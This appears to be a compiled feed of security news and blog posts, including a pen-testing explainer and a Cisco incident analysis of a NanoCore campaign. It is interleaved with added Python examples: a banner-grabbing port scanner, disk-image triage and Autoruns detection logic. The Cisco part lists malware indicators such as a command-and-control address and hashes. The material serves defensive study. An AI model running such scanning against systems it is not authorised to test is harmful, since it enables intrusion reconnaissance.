5ss5c Ransomware emerges after Satan went down in the hell
Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins
Hundreds of million users installed Android fleeceware apps from Google Play
Two PoC exploits for CVE-2020-0601 NSACrypto flaw released
Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity
Expert released PoC exploits for recently disclosed Cisco DCNM flaws
Hack the Army bug bounty program paid $275,000 in rewards
Law enforcement seized WeLeakInfo.com for selling access to data from data breaches
Cybercrime Statistics in 2019
Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day
Turkish Hackers hit Greek Government websites and local stock exchange

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 247 appeared first on Security Affairs.

IoT cybersecurity’s worst kept secret

By improving access to data and taking advantage of them in fundamentally different ways to drive profitability, IT security executives are rapidly changing perceptions of their office. Although making better sense of and use of data may be standard fare in other areas of the enterprise, who knew that modern IoT cybersecurity solutions would become network security’s newest professional lever? Actually, we should have seen it coming, because digital transformation always starts with visibility and … More

The post IoT cybersecurity’s worst kept secret appeared first on Help Net Security.

How to govern cybersecurity risk at the board level

Rapidly evolving cybersecurity threats are now commanding the attention of senior business leaders and boards of directors and are no longer only the concern of IT security professionals. A report from University of California, Berkeley’s Center for Long-Term Cybersecurity (CLTC) and Booz Allen Hamilton uses insights gleaned from board members with over 130 years of board service across nine industry sectors to offer guidance for boards of directors in managing cybersecurity within large global companies. … More

The post How to govern cybersecurity risk at the board level appeared first on Help Net Security.

Worldwide IT spending to total $3.9 trillion in 2020

Worldwide IT spending is projected to total $3.9 trillion in 2020, an increase of 3.4% from 2019, according to the latest forecast by Gartner. Global IT spending is expected to cross into $4 trillion territory next year. “Although political uncertainties pushed the global economy closer to recession, it did not occur in 2019 and is still not the most likely scenario for 2020 and beyond,” said John-David Lovelock, distinguished research vice president at Gartner. “With … More

The post Worldwide IT spending to total $3.9 trillion in 2020 appeared first on Help Net Security.

Changing the monolith—Part 2: Whose support do you need?

In Changing the monolith—Part 1: Building alliances for a secure culture, I explored how security leaders can build alliances and why a commitment to change must be signaled from the top. But whose support should you recruit in the first place? In Part 2, I address considerations for the cybersecurity team itself, the organization’s business leaders, and the employees whose buy-in is critical.

Build the right cybersecurity team

It could be debated that the concept of a “deep generalist” is an oxymoron. The analogy I frequently find myself making is you would never ask a dermatologist to perform a hip replacement. A hip replacement is best left to an orthopedic surgeon who has many hours of hands-on experience performing hip replacements. This does not lessen the importance of the dermatologist, who can quickly identify and treat potentially lethal diseases such as skin cancer.

Similarly, not every cybersecurity and privacy professional is deep in all subjects such as governance, technology, law, organizational dynamics, and emotional intelligence. No person is born a specialist.

If you are looking for someone who is excellent at threat prevention, detection, and incident response, hire someone who specializes in those specific tasks and has demonstrated experience and competency. Likewise, be cautious of promoting cybersecurity architects to the role of Chief Information Security Officer (CISO) if they have not demonstrated strategic leadership with the social aptitude to connect with other senior leaders in the organization. CISOs, after all, are not technology champions as much as they are business leaders.

Keep business leaders in the conversation

Leaders can enhance their organizations’ security stance by sending a top-down message across all business units that “security begins with me.” One way to send this message is to regularly brief the executive team and the board on cybersecurity and privacy risks.

Image of three coworkers working at a desk in an office.

Keep business leaders accountable about security.

These should not be product status reports, but briefings on key performance indicators (KPIs) of risk. Business leaders, in turn, must tell the security team what the organization considers to be its top risks.

Here are three ways to guide these conversations:

  1. Evaluate the existing cyber-incident response plan within the context of the overall organization’s business continuity plan. Elevate cyber-incident response plans to account for major outages, severe weather, civil unrest, and epidemics—which all place similar, if not identical, stresses to the business. Ask leadership what they believe the “crown jewels” to be, so you can prioritize your approach to data protection. The team responsible for identifying the “crown jewels” should include senior management from the lines of businesses and administrative functions.
  2. Review the cybersecurity budget with a business case and a strategy in mind. Many times, security budgets take a backseat to other IT or business priorities, resulting in companies being unprepared to deal with risks and attacks. An annual review of cybersecurity budgets tied to what looks like a “good fit” for the organization is recommended.
  3. Reevaluate cyber insurance on an annual basis and revisit its use and requirements for the organization. Ensure that it’s effective against attacks that could be considered “acts of war,” which might otherwise not be covered by the organization’s policy. Review your policy and ask: What happens if the threat actor was a nation state aiming for another nation state, placing your organization in the crossfire?

Gain buy-in through a frictionless user experience

“Shadow IT” is a persistent problem when there is no sanctioned way for users to collaborate with the outside world. Similarly, users save and hoard emails when, in response to an overly zealous data retention policy, their emails are deleted after 30 days.

Digital transformation introduces a sea change in how cybersecurity is implemented. It’s paramount to provide the user with the most frictionless user experience available, adopting mobile-first, cloud-first philosophies.

Ignoring the user experience in your change implementation plan will only lead users to identify clever ways to circumvent frustrating security controls. Look for ways to prioritize the user experience even while meeting security and compliance goals.

Incremental change versus tearing off the band-aid

Imagine slowly replacing the interior and exterior components of your existing vehicle one by one until you have a “new” car. It doesn’t make sense: You still have to drive the car, even while the replacements are being performed!

Similarly, I’ve seen organizations take this approach in implementing change, attempting to create a modern workplace over a long period of time. However, this draws out complex, multi-platform headaches for months and years, leading to user confusion, loss of confidence in IT, and lost productivity. You wouldn’t “purchase” a new car this way; why take this approach for your organization?

Rather than mixing old parts with new parts, you would save money, shop time, and operational (and emotional) complexity by simply trading in your old car for a new one.

Fewer organizations take this alternative approach of “tearing off the band-aid.” If the user experience is frictionless, more efficient, and enhances the ease of data protection, an organization’s highly motivated employee base will adapt much more easily.

Stay tuned and stay updated

Stay tuned for more! In my next installments, I will cover the topics of process and technology, respectively, and their role in changing the security monolith. Technology on its own solves nothing. What good are building supplies and tools without a blueprint? Similarly, process is the orchestration of the effort, and is necessary to enhance an organization’s cybersecurity, privacy, compliance, and productivity.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the monolith—Part 2: Whose support do you need? appeared first on Microsoft Security.

What is Network Penetration Testing?

Estimated reading time: 2 minutes

Network Penetration Testing, also known as pen testing or ethical hacking, refers to the practice of identifying vulnerabilities in networks, systems, hosts or other related devices in a controlled environment. The objective of Network Penetration Testing is to identify and plug gaps in a network’s security apparatus before external actors like hackers find them.

Network penetration tests are a form of external audit, usually carried out by white-hat testers, and are commissioned by organizations across sectors. Though similar to vulnerability assessments, there is a major difference: network penetration testing does not depend on a signature-based approach, which could be outdated and unable to discover real-world vulnerabilities. Network penetration testing simulates how a real-world attack on the network may happen. In that sense, it gives organizations the attacker’s perspective and hence enables a better understanding of their own security posture.

To ensure there is standardization in approach, network penetration testing normally follows the widely adopted Penetration Testing Execution Standard (PTES), work on which began in 2009. The methodology consists of the seven phases below –

Pre-engagement interactions

At this stage, the scope of the testing is outlined and finalized. Other pre-engagement interactions are also conducted to fully finalize on aspects of testing, analysis and results.

Intelligence Gathering

This stage focuses on gathering information about the network or system to be tested and its connections, through passive reconnaissance (open-source intelligence) as well as active probing, so that the later phases can be targeted.

Threat Modeling

In this stage, the information gathered is used to identify the assets that matter most to the organization (data, systems, people) and the threat agents capable of attacking them, so that the test prioritizes the attack paths a real adversary would take.

Vulnerability Analysis

This stage involves discovering vulnerabilities within the network through automated scans and deep-dive manual techniques, validating them to weed out false positives, and documenting them to formulate an attack plan.

Exploitation

This is the stage where the actual exploitation attempt takes place on the basis of the analysis of the vulnerabilities discovered, with the goal of demonstrating real impact rather than merely listing weaknesses.

Post Exploitation

In the Post Exploitation phase, further analysis is done of the exploited network to identify other means of access.

Reporting in Network Penetration Testing

This is the stage where findings are analyzed, rated by risk and compiled into a report, with remediation guidance, for action to be taken.
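
As an added example that is not part of the Seqrite post, the Python below shows the first two phases in code: the engagement scope is enforced before a single connection is attempted, and a TCP connect scan with banner grabbing produces structured findings for the later phases to build on. The target is a fake service started in-process so the example runs offline; the CIDRs, target addresses and banner are constructed values.

```python
"""Scope-gated TCP connect scan with banner grabbing (added example).

Shows two PTES phases in code: the pre-engagement scope is enforced before
any packet leaves the tester's host, and intelligence gathering produces
structured findings for later phases. The target is a fake service started
in-process; CIDRs, addresses and banner are constructed values.
"""
import ipaddress
import socket
import threading


def in_scope(target, scope):
    """True only if target lies inside an authorised CIDR block from the scope document."""
    ip = ipaddress.ip_address(target)
    return any(ip in ipaddress.ip_network(cidr, strict=False) for cidr in scope)


def grab_banner(host, port, timeout=0.5):
    """TCP connect: return the banner ('' if the service is silent) or None if closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256).decode("ascii", "replace").strip()
            except socket.timeout:
                return ""
    except OSError:
        return None


def scan(scope, targets, ports):
    """Scan in-scope targets only; record out-of-scope requests instead of touching them."""
    report = {"scope": list(scope), "out_of_scope": [], "hosts": {}}
    for target in targets:
        if not in_scope(target, scope):
            report["out_of_scope"].append(target)
            continue
        services = {}
        for port in ports:
            banner = grab_banner(target, port)
            if banner is not None:
                services[port] = banner
        report["hosts"][target] = services
    return report


def start_fake_service(banner, connections=4):
    """Constructed target: a localhost listener that sends a banner and hangs up."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen()
    port = srv.getsockname()[1]

    def serve():
        for _ in range(connections):
            conn, _ = srv.accept()
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def free_closed_port():
    """Bind and immediately release an ephemeral port so the scan sees a closed one."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    open_port = start_fake_service(b"SSH-2.0-OpenSSH_7.4\r\n")
    result = scan(scope=["127.0.0.0/8"],
                  targets=["127.0.0.1", "10.9.9.9"],      # the second address is out of scope
                  ports=[open_port, free_closed_port()])
    print(result)
```

The out-of-scope list is part of the deliverable: a tester who is handed a target outside the agreed CIDRs should be able to show that it was never touched, and the same gate belongs in front of every later phase, not only the scan.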

The cybersecurity industry is undergoing a paradigm shift where the focus for enterprises is rapidly shifting from threat detection to threat prevention. In such a scenario, it is imperative that enterprises have regular network penetration tests to gain a better understanding of their security posture. It is not enough anymore to depend on cybersecurity solutions alone; efforts must be taken to test and ensure cybersecurity stays up-to-date against ever-changing threats.

Red Team Assessments by Seqrite

In this regard, enterprises can consider Red Team Assessments which have been recommended by the Reserve Bank of India, India’s central bank, for banking institutions. In a red team exercise, highly trained security consultants attempt to breach the security of the organization to expose potential physical, hardware, software and human vulnerabilities.

A comprehensive Red Team exercise exposes vulnerabilities and risks regarding

  • Networks, applications, switches, mobile devices
  • Social engineering (onsite, telephone, email/text, chat)
  • Physical attacks (pen-drive bypass, camera evasion, alarm bypass, Wi-Fi attack etc.)

Red Team Audits are one among various services offered by Seqrite to enable organizations to proactively protect IT assets and respond to cybersecurity threats. Other services offered include Technical Audits, Compliance Audits, Security Management and Security Consulting.

The post What is Network Penetration Testing? appeared first on Seqrite Blog.

Embedding security, the right way

As organizations proceed to move their processes from the physical world into the digital, their risk profile changes, too – and this is not a time to take risks. By not building security into DevOps processes, organizations are exposing their business in new and surprising ways.

DevOps

DevOps has accelerated software development dramatically, but it has also created a great deal of pain for traditional security teams raised up on performing relatively slow testing. Moving … More

The post Embedding security, the right way appeared first on Help Net Security.

Emotet remains the dark market leader for delivery-as-a-service

The vast majority of nationally sponsored cybersecurity incidents take the form of espionage through data exfiltration, with frequent employment of the remote access tool Plug-X, according to the annual threat report by eSentire.

Emotet is the leader

The report found that Emotet accounted for almost 20% of confirmed malware incidents, reinforcing its role in the black market as the preferred delivery tool. Emotet was the most observed threat both on networks and on endpoints, achieving this … More

The post Emotet remains the dark market leader for delivery-as-a-service appeared first on Help Net Security.

Six trends attracting the attention of enterprise technology leaders

Organizations around the world will accelerate enterprise technology investment in 2020, leveraging digital improvements to make them more competitive, improve connections with consumers, and keep up with the increasing demands of privacy regulation and security needs. Hyland has identified six technology trends that will drive these improvements and demand the attention of CIOs and CTOs in the coming year and beyond.

Prioritize cloud control

Organizations will opt for managed cloud services to increase security and efficiency. … More

The post Six trends attracting the attention of enterprise technology leaders appeared first on Help Net Security.

Global security services industry to experience spend growth of more than $80 billion

The global security services industry is poised to experience spend growth of more than $80 billion between 2019 and 2024, at a CAGR of over 8% during the forecast period, according to SpendEdge. Factors such as the increase in instances of IP infringement and the growing frequency of economic and sporting events are exposing the masses to significant security risks. This is creating a pressing requirement to engage security services across the domestic and business sectors across the globe … More

The post Global security services industry to experience spend growth of more than $80 billion appeared first on Help Net Security.

Disk Image Deception

Cisco’s Computer Security Incident Response Team (CSIRT) detected a large and ongoing malspam campaign leveraging the .IMG file extension to bypass automated malware analysis tools and infect machines with a variety of Remote Access Trojans. During our investigation, we observed multiple tactics, techniques, and procedures (TTPs) that defenders can monitor for in their environments. Our incident response and security monitoring team’s analysis of a suspicious phishing attack uncovered some helpful improvements in our detection capabilities and timing.

In this case, none of our intelligence sources had identified this particular campaign yet. Instead, we detected this attack with one of our more exploratory plays, looking for evidence of persistence in the Windows Autoruns data. This play successfully detected an attack against a handful of endpoints that used email as the initial access vector and had evaded our defenses at the time. Less than a week after the incident, we received alerts from our retrospective plays for this same campaign once our integrated threat intelligence sources delivered the indicators of compromise (IOCs). This blog is a high-level write-up of how we adapted to a potentially successful attack campaign and of our tactical analysis to help prevent and detect future campaigns.

(This blog was co-authored by Jeff Bollinger & William Sheldon)

Incident Response Techniques and Strategy

The Cisco Computer Security and Incident Response Team (CSIRT) monitors Cisco for threats and attacks against our systems, networks, and data. The team provides global threat detection, incident response, and security investigations. Staying relevant as an IR team means continuously developing and adapting the best ways to defend the network, data, and infrastructure. We’re constantly experimenting with how to improve the efficiency of our data-centric playbook approach in the hope it will free up more time for threat hunting and more in-depth analysis and investigations. Part of our approach has been that as we discover new methods for detecting risky activity, we try to codify those methods and techniques into our incident response monitoring playbook to keep an eye on any potential future attacks.

Although some malware campaigns can slip past the defenses with updated techniques, we preventively block the well-known, or historical, indicators and leverage broad, exploratory analysis playbooks that focus more on how attackers operate and infiltrate. In other words, there is value in monitoring for the basic atomic indicators of compromise like IP addresses, domain names, file hashes, etc., but to go further you really have to look broadly at more generic attack techniques. These playbooks, or plays, help us find out about new attack campaigns that are possibly targeted and potentially more serious. While some might label this activity “threat hunting”, this data exploration process allows us to discover, track, and potentially share new indicators that get exposed during a deeper analysis.

Defense in depth demands that we utilize additional data sources in case attackers successfully evade one or more of our defenses, or if they were able to obscure their malicious activities enough to avoid detection. Recently we discovered a malicious spam campaign that almost succeeded due to a missed early detection. In one of our exploratory plays, we use daily diffs for all the Microsoft Windows registry autorun key changes since the last boot. Known as “Autoruns“, this data source ultimately helped us discover an ongoing attack that was attempting to deliver a remote access trojan (RAT). Along with the more mundane Windows event logs, we pieced together the attack from the moment it arrived and made some interesting discoveries on the way — most notably how the malware seemingly slipped past our front line filters. Not only did we uncover many technical details about the campaign, but we also used it as an opportunity to refine our incident response detection techniques and some of our monitoring processes.

IMG File Format Analysis

.IMG files are traditionally disk image files storing raw dumps of either a magnetic disk or an optical disc. Other disk image file formats include ISO and BIN. Previously, mounting disk image files on Windows required the user to install third-party software. However, Windows 8 and later automatically mount IMG files on open. Upon mounting, Windows File Explorer displays the data inside the .IMG file to the end user. Although disk image files are traditionally utilized for storing raw binary data, or bit-by-bit copies of a disk, any data could be stored inside them. Because of this functionality in the core Windows operating system, attackers are abusing disk image formats to “smuggle” data past antivirus engines, network perimeter defenses, and other automatic mitigation security tooling. Attackers have also used the capability to obscure malicious second-stage files hidden within a filesystem by using ISO and DMG (to a lesser extent). Perhaps the IMG extension also fools victims into considering the attachment an image instead of a binary Pandora’s box.
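
As an added example (not part of the Cisco write-up), the following Python inspects a disk image attachment without mounting it: it recognises a FAT boot sector or an ISO 9660 primary volume descriptor by their fixed-offset signatures, walks a FAT12/16 root directory, and flags executable payloads by extension. The sample image is constructed in memory; the RISKY_EXTENSIONS set is an assumption, and whole-disk images that begin with a partition table are reported as unknown rather than parsed.

```python
"""Triage a .IMG attachment without mounting it (added example).

Recognises the container by its on-disk signature (FAT boot sector or
ISO 9660 primary volume descriptor), walks a FAT12/16 root directory and
flags executable payloads by extension, so a suspicious attachment can be
examined without handing it to the operating system. The sample image is
constructed in memory; RISKY_EXTENSIONS is an assumption.
"""
import struct

RISKY_EXTENSIONS = {"EXE", "SCR", "COM", "PIF", "BAT", "CMD", "JS", "JSE",
                    "VBS", "VBE", "WSF", "HTA", "LNK", "PS1", "MSI", "DLL"}


def identify_image(img):
    """Return 'iso9660', 'fat' or 'unknown' from fixed-offset signatures."""
    if len(img) >= 0x8006 and img[0x8001:0x8006] == b"CD001":
        return "iso9660"            # primary volume descriptor at sector 16
    if len(img) >= 512 and img[510:512] == b"\x55\xAA" and img[0] in (0xEB, 0xE9):
        return "fat"                # boot sector: jump opcode + 0xAA55 signature
    return "unknown"                # e.g. whole-disk image with a partition table


def fat_root_entries(img):
    """Yield (name, attr, size) for each live 8.3 entry in a FAT12/16 root directory."""
    bps, _spc, reserved, nfats, root_entries = struct.unpack_from("<HBHBH", img, 11)
    fat_sectors = struct.unpack_from("<H", img, 22)[0]
    root_off = (reserved + nfats * fat_sectors) * bps
    for i in range(root_entries):
        e = img[root_off + 32 * i: root_off + 32 * (i + 1)]
        if len(e) < 32 or e[0] == 0x00:
            break                   # 0x00 marks the end of the directory
        if e[0] == 0xE5:
            continue                # deleted entry
        attr = e[11]
        if attr == 0x0F or attr & 0x08:
            continue                # long-name fragment or volume label
        base = e[0:8].decode("ascii", "replace").rstrip()
        ext = e[8:11].decode("ascii", "replace").rstrip()
        size = struct.unpack_from("<I", e, 28)[0]
        yield (f"{base}.{ext}" if ext else base), attr, size


def triage_image(img):
    """Summarise the image: filesystem type, root files, and executables worth a closer look."""
    kind = identify_image(img)
    result = {"filesystem": kind, "files": [], "risky": []}
    if kind == "fat":
        for name, attr, size in fat_root_entries(img):
            result["files"].append((name, size))
            is_dir = bool(attr & 0x10)
            if not is_dir and name.rsplit(".", 1)[-1].upper() in RISKY_EXTENSIONS:
                result["risky"].append(name)
    return result


def build_fat12_sample(files):
    """Constructed sample: a 64-sector FAT12 image whose root holds the given files."""
    bpb = struct.pack("<3s8sHBHBHHBHHHII", b"\xEB\x3C\x90", b"MSWIN4.1",
                      512, 1, 1, 1, 16, 64, 0xF8, 1, 1, 1, 0, 0)
    boot = (bpb.ljust(54, b"\x00") + b"FAT12   ").ljust(510, b"\x00") + b"\x55\xAA"
    fat = b"\xF8\xFF\xFF".ljust(512, b"\x00")          # media byte + end-of-chain markers
    root = b""
    for i, (name, data) in enumerate(files):
        base, ext = name.split(".")
        short = f"{base:<8}{ext:<3}".encode("ascii")   # 8.3 name, space padded
        root += struct.pack("<11sB", short, 0x20) + bytes(14) + struct.pack("<HI", 2 + i, len(data))
    root = root.ljust(16 * 32, b"\x00")
    data = b"".join(d.ljust(512, b"\x00") for _, d in files)
    return (boot + fat + root + data).ljust(64 * 512, b"\x00")


if __name__ == "__main__":
    sample = build_fat12_sample([("INVOICE.EXE", b"MZ\x90\x00"), ("README.TXT", b"hello")])
    print(triage_image(sample))
```

Reading the directory yourself is the point: a mail gateway that only hashes the outer .IMG never sees the executable inside, while a listing of the root directory immediately shows a lone INVOICE.EXE in a file that claims to be a delivery document.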

Know Where You’re Coming From

As phishing as an attack vector continues to grow in popularity, we have recently focused on several of our email incident response plays around detecting malicious attachments, business email compromise techniques like header tampering or DNS typosquatting, and preventative controls with inline malware prevention and malicious URL rewriting.

Any security tool that has even temporarily outdated definitions of threats or IOCs will be unable to detect a very recent event or an event with a recent, and therefore unknown, indicator. To ensure that these missed detections are not overlooked, we take a retrospective look back to see if any newly observed indicators are present in any previously delivered email. So when a malicious attachment is delivered to a mailbox, if the email scanners and sandboxes do not catch it the first time, our retrospective plays look back to see if the updated indicators are triggered. Over time, sandboxes update their detection abilities and previously “clean” files could change status. The goal is to detect this changing status and, if we have any exposure, reach out and remediate the host.

This process flow shows our method for detecting and responding to updated verdicts from sandbox scanners. During this process we collect logs throughout to ensure we can match against hashes or any other indicator or metadata we collect: 

Figure 1: Flow chart for retrospective alerting (retrospective email detection incident response)

This process in combination with several other threat hunting style plays helped lead us to this particular campaign. The IMG file isn’t unique by any means but was rare and stood out to our analysts immediately when combined with the file name as a fake delivery invoice – one of the more tantalizing and effective types of phishing lures.
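
To make the look-back concrete, here is an added example (not Cisco's implementation) of the retrospective check described above: deliveries are recorded with the verdict they carried at the time, and each later verdict update is replayed against that record, escalating every exposed recipient exactly once together with the measured detection lag. The delivery log, hashes and verdict feeds are constructed.

```python
"""Retrospective alerting over delivered-attachment records (added example).

Every attachment that reached a mailbox is recorded with the verdict it
carried at delivery time; when a sandbox or intelligence feed later changes
its verdict, the record is re-checked and each exposed recipient is
escalated exactly once, with the detection lag. Log and feeds are constructed.
"""
from datetime import datetime, timedelta

# Constructed delivery log: message_id|recipient|attachment_sha256|delivered_at|verdict_at_delivery
DELIVERY_LOG = [
    "m1|alice|aa11|2019-06-20T09:00:00|clean",
    "m2|bob|aa11|2019-06-20T09:02:00|clean",
    "m3|carol|bb22|2019-06-20T10:00:00|clean",
    "m4|dave|cc33|2019-06-20T11:00:00|malicious",   # blocked inline: no exposure
]


def parse_delivery_log(lines):
    records = []
    for line in lines:
        msg_id, rcpt, sha, ts, verdict = line.strip().split("|")
        records.append({"message_id": msg_id, "recipient": rcpt, "sha256": sha,
                        "delivered_at": datetime.fromisoformat(ts),
                        "verdict_at_delivery": verdict})
    return records


class RetrospectiveDetector:
    """Re-evaluates past deliveries whenever an indicator's verdict changes."""

    def __init__(self, deliveries):
        self.deliveries = deliveries
        self.escalated = set()      # (sha256, message_id) pairs already alerted on

    def apply_verdicts(self, updates):
        """updates: iterable of (sha256, verdict, observed_at). Returns only new alerts."""
        alerts = []
        for sha, verdict, observed_at in updates:
            if verdict != "malicious":
                continue            # a later downgrade to clean never retracts exposure
            for rec in self.deliveries:
                if rec["sha256"] != sha or rec["verdict_at_delivery"] == "malicious":
                    continue        # different file, or it never reached the mailbox
                key = (sha, rec["message_id"])
                if key in self.escalated:
                    continue        # idempotent: replaying a feed produces no duplicates
                self.escalated.add(key)
                lag = observed_at - rec["delivered_at"]
                alerts.append({"message_id": rec["message_id"],
                               "recipient": rec["recipient"],
                               "sha256": sha,
                               "detection_lag_hours": round(lag / timedelta(hours=1), 1)})
        return alerts


if __name__ == "__main__":
    detector = RetrospectiveDetector(parse_delivery_log(DELIVERY_LOG))
    # Day-zero feed still says clean: nothing fires.
    print(detector.apply_verdicts([("aa11", "clean", datetime(2019, 6, 20, 12))]))
    # Five days later the sandbox changes its mind: both recipients of aa11 are escalated.
    print(detector.apply_verdicts([("aa11", "malicious", datetime(2019, 6, 25, 9)),
                                   ("cc33", "malicious", datetime(2019, 6, 25, 9))]))
```

The lag field is what turns this from a cleanup task into a measurement: tracking how long files sat in mailboxes before their verdict flipped tells you which scanner or feed is consistently late and where a sandbox detonation on delivery would pay for itself.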

Incident Response and Analysis

We needed to pull apart as much of the malicious components as possible to understand how this campaign worked and how it might have slipped our defenses temporarily. The process tree below shows how the executable file dropped from the original IMG file attachment after mounting led to a Nanocore installation:

Figure 2: Visualization of the malicious process tree (analysis behavior graph).

Autoruns

As part of our daily incident response playbook operations, we recently detected a suspicious Autoruns event on an endpoint. This log (Figure 3) indicated that an unsigned binary with multiple detections on the malware analysis site VirusTotal had established persistence using the ‘Run’ registry key. Any time the user logged in, the binary referenced in the “run key” would automatically execute – in this case the binary called itself “filename.exe” and was dropped in the typical user-writable “%USERPROFILE%\AppData\Roaming” (%APPDATA%) directory:

{
    "enabled": "enabled",
    "entry": "startupname",
    "entryLocation": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    "file_size": "491008",
    "hostname": "[REDACTED]",
    "imagePath": "c:\\users\\[REDACTED]\\appdata\\roaming\\filename.exe",
    "launchString": "C:\\Users\\[REDACTED]\\AppData\\Roaming\\filename.exe",
    "md5": "667D890D3C84585E0DFE61FF02F5E83D",
    "peTime": "5/13/2019 12:48 PM",
    "sha256": "42CCA17BC868ADB03668AADA7CF54B128E44A596E910CFF8C13083269AE61FF1",
    "signer": "",
    "vt_link": "https://www.virustotal.com/file/42cca17bc868adb03668aada7cf54b128e44a596e910cff8c13083269ae61ff1/analysis/1561620694/",
    "vt_ratio": "46/73",
    "sourcetype": "autoruns"
}


Figure 3: Snippet of the event showing an unknown file attempting to persist on the victim host

Many of the anti-virus engines on VirusTotal detected the binary as the NanoCore Remote Access Trojan (RAT), a well known malware kit sold on underground markets which enables complete control of the infected computer: recording keystrokes, enabling the webcam, stealing files, and much more. Since this malware poses a huge risk and the fact that it was able to achieve persistence without getting blocked by our endpoint security, we prioritized investigating this alert further and initiated an incident. 
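What made this event worth an incident was not any single field but the way several weak signals stacked up: a Run-key entry, an empty signer, a binary living under AppData\Roaming, and a high VirusTotal ratio. The following is an added example of that triage logic, not Cisco CSIRT's Autoruns play. The first event is the one from Figure 3; the second is a constructed benign entry for contrast. The user-writable-path pattern, the 25% VirusTotal cut-off and the "three reasons" alert threshold are assumptions to tune locally.

```python
"""Triage of an Autoruns event for a suspicious Run-key entry.

Added example, not Cisco CSIRT's code. FIGURE3_EVENT is the event shown in
Figure 3; BENIGN_EVENT is constructed for contrast. Thresholds and the
user-writable path pattern are assumptions.
"""
import json
import re

FIGURE3_EVENT = json.loads(r'''{
    "enabled": "enabled",
    "entry": "startupname",
    "entryLocation": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    "file_size": "491008",
    "hostname": "[REDACTED]",
    "imagePath": "c:\\users\\[REDACTED]\\appdata\\roaming\\filename.exe",
    "launchString": "C:\\Users\\[REDACTED]\\AppData\\Roaming\\filename.exe",
    "md5": "667D890D3C84585E0DFE61FF02F5E83D",
    "peTime": "5/13/2019 12:48 PM",
    "sha256": "42CCA17BC868ADB03668AADA7CF54B128E44A596E910CFF8C13083269AE61FF1",
    "signer": "",
    "vt_link": "https://www.virustotal.com/file/42cca17bc868adb03668aada7cf54b128e44a596e910cff8c13083269ae61ff1/analysis/1561620694/",
    "vt_ratio": "46/73",
    "sourcetype": "autoruns"
}''')

# Constructed benign entry: signed vendor updater under Program Files, no VT hits.
BENIGN_EVENT = {
    "entryLocation": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    "imagePath": "c:\\program files\\examplevendor\\updater.exe",
    "signer": "Example Vendor Inc.",
    "vt_ratio": "0/73",
    "sourcetype": "autoruns",
}

RUN_KEY_SUFFIXES = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)
# Locations a standard user can write to; persistence from here is rarely legitimate.
USER_WRITABLE = re.compile(r"\\(appdata\\(roaming|local)|temp|downloads|public)\\", re.I)


def parse_vt_ratio(ratio):
    """'46/73' -> (46, 73); anything unparsable counts as no data."""
    try:
        detected, total = ratio.split("/")
        return int(detected), int(total)
    except (AttributeError, ValueError):
        return 0, 0


def triage(event):
    """Return the list of reasons this Autoruns entry deserves attention."""
    reasons = []
    location = event.get("entryLocation", "").lower()
    if location.endswith(RUN_KEY_SUFFIXES):
        reasons.append("run-key persistence")
    if not event.get("signer"):
        reasons.append("unsigned binary")
    if USER_WRITABLE.search(event.get("imagePath", "")):
        reasons.append("binary in user-writable directory")
    detected, total = parse_vt_ratio(event.get("vt_ratio"))
    if total and detected / total >= 0.25:
        reasons.append(f"{detected}/{total} VirusTotal detections")
    return reasons


def should_alert(event, minimum_reasons=3):
    """Alert when several weak signals stack up on one entry (threshold is an assumption)."""
    return len(triage(event)) >= minimum_reasons
```

Scoring by stacked reasons rather than by the VirusTotal ratio alone matters for the retrospective case: a fresh sample with 0/73 detections still lights up "unsigned" and "user-writable path", which is enough to queue it for a second look once the vendors catch up.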

Once we identified this infected host using one of our exploratory Autoruns plays, the immediate concern was containing the threat to mitigate as much potential loss as possible. We downloaded a copy of the dropper malware from the infected host and performed additional analysis. Initially we wanted to confirm whether other online sandbox services agreed with the findings on VirusTotal. Other services, including app.any.run, also detected Nanocore based on a file called run.dat being written to the %APPDATA%\Roaming\{GUID} folder, as shown in Figure 3:

Figure 4: app.any.run analysis showing Nanocore infection

The sandbox report also alerted us to an unusual outbound network connection from RegAsm.exe to 185.101.94.172 over port 8166.

Now that we were confident this was not a false positive, we needed to find the root cause of this infection to determine whether any other users were at risk of becoming victims of this campaign. To begin answering this question, we pulled the Windows Security Event Logs from the host using our asset management tool to gain a better understanding of what occurred on the host at the time of the incident. Immediately, a suspicious event that was occurring every second jumped out due to the unusual and unexpected activity of a file named “DHL_Label_Scan _ June 19 2019 at 2.21_06455210_PDF.exe” spawning the Windows Assembly Registration tool RegAsm.exe.

Process Information:
 New Process ID:  0x4128
 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Figure 5: New process spawned from a ‘CdRom0’ device (the fake .img) calling the Windows Assembly Registration tool

This event stands out for several reasons.

  • The filename:
    1. Attempts to social engineer the user into thinking they are executing a PDF by appending “_PDF”
    2. “DHL_Label_Scan” Shipping services are commonly spoofed by adversaries in emails to spread malware.
  • The file path:
    1. \Device\CdRom0\ is a special directory associated with a CD-ROM that has been inserted into the disk drive.
    2. A fake DHL label is a strange thing to have on a CD-ROM and even stranger to insert it to a work machine and execute that file.
  • The process relationship:
    1. Adversaries abuse the Assembly Registration tool “RegAsm.exe” for bypassing process whitelisting and anti-malware protection.
